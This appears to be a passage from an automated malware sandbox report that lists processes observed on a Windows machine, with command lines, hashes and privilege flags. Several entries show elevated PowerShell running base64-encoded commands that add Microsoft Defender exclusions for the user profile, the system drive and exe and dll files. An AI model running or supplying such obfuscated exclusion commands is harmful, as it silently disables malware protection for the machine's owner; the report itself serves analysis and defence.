                          Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          Target ID:39
                          Start time:01:42:19
                          Start date:27/03/2022
                          Path:C:\Windows\System32\dllhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{bb7b2400-d282-40c3-8b5b-9f36c353d0f9}
                          Imagebase:0x7ff6535c0000
                          File size:20888 bytes
                          MD5 hash:2528137C6745C4EADD87817A1909677E
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:42
                          Start time:01:42:25
                          Start date:27/03/2022
                          Path:C:\Windows\System32\winlogon.exe
                          Wow64 process (32bit):false
                          Commandline:winlogon.exe
                          Imagebase:0x7ff775840000
                          File size:677376 bytes
                          MD5 hash:F9017F2DC455AD373DF036F5817A8870
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:43
                          Start time:01:42:29
                          Start date:27/03/2022
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:"cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
                          Imagebase:0x7ff7bb450000
                          File size:273920 bytes
                          MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:44
                          Start time:01:42:29
                          Start date:27/03/2022
                          Path:C:\Windows\System32\lsass.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\lsass.exe
                          Imagebase:0x7ff765a60000
                          File size:57976 bytes
                          MD5 hash:317340CD278A374BCEF6A30194557227
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:45
                          Start time:01:42:34
                          Start date:27/03/2022
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff647620000
                          File size:625664 bytes
                          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:46
                          Start time:01:42:35
                          Start date:27/03/2022
                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          Wow64 process (32bit):false
                          Commandline:powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
                          Imagebase:0x7ff6ba650000
                          File size:447488 bytes
                          MD5 hash:95000560239032BC68B4C2FDFCDEF913
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:.Net C# or VB.NET

                          Target ID:47
                          Start time:01:42:37
                          Start date:27/03/2022
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay
                          Imagebase:0x7ff7338d0000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:49
                          Start time:01:42:40
                          Start date:27/03/2022
                          Path:C:\Windows\System32\svchost.exe
                          Wow64 process (32bit):false
                          Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM
                          Imagebase:0x7ff7338d0000
                          File size:51288 bytes
                          MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language

                          Target ID:50
                          Start time:01:42:45
                          Start date:27/03/2022
                          Path:C:\Windows\System32\dwm.exe
                          Wow64 process (32bit):false
                          Commandline:dwm.exe
                          Imagebase:0x7ff7aa950000
                          File size:62464 bytes
                          MD5 hash:70073A05B2B43FFB7A625708BB29E7C7
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language

                          No disassembly